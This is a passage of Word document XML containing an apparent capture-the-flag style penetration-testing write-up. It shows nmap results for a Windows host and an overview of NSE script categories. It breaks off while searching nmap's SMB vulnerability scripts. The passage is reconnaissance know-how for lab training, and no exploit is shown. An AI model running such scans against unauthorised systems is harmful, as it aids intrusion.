      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)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 xml:space="preserve">49152/tcp </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msrpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        Microsoft Windows RPC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 xml:space="preserve">49153/tcp </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msrpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        Microsoft Windows RPC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 xml:space="preserve">49154/tcp </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msrpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        Microsoft Windows RPC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 xml:space="preserve">49155/tcp </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msrpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        Microsoft Windows RPC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 xml:space="preserve">49156/tcp </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msrpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        Microsoft Windows RPC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 xml:space="preserve">49157/tcp </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msrpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        Microsoft Windows RPC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 xml:space="preserve">Service Info: Host: HARIS-PC; OS: Windows; CPE: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cpe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>o:microsoft</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:spacing w:after="225" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Apparently, the team is running the SMB service with port 445.</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">We will continue listing this service, for this we will use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> scripts specifically for the SMB service.</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>SMB, is a network protocol that allows files, printers and others services to be shared between nodes of a network of computers that use the Microsoft Windows operating system.</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="0013348D">
          <w:rPr>
            <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Full Article</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:spacing w:after="225" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Scanning vulnerabilities using Nmap scripts for an audit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:spacing w:after="225" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap is highly recognized in the world of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Informatic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> security for its functionality of scanning networks, ports and services. However, the tool has been improving over the years, offering more and </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">more possibilities that are very interesting. Currently incorporates the use of scripts to check some of the most known vulnerabilities, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Which</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> are classified in:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="225"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Auth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Run all your scripts available for authentication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="225"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Default: Executes the default basic scripts of the tool</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="225"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Discovery: Retrieve information from the target or victim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="225"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>External: Script to use external resources</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="225"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Intrusive: Uses scripts that are considered intrusive to the victim or target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="225"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Malware: Check for malicious code connections or backdoors (backdoors)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="225"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Safe: Executes the scripts not intrusive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="225"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Discover the most known vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="225"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>All: Runs absolutely all scripts with NSE extension available</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:spacing w:after="225" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>To perform a search of the scripts related to SMB and use them with Nmap, we do the following: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MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>╭</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>─[~/Desktop/APOLO/Ethic4l-Hacking/Operations/Premium/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Blue]─</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[root@Arthorias]─[0]─[3672]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MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>╰</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>─[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)]</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D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13348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t># ls /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">/scripts/ | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>smb-vuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
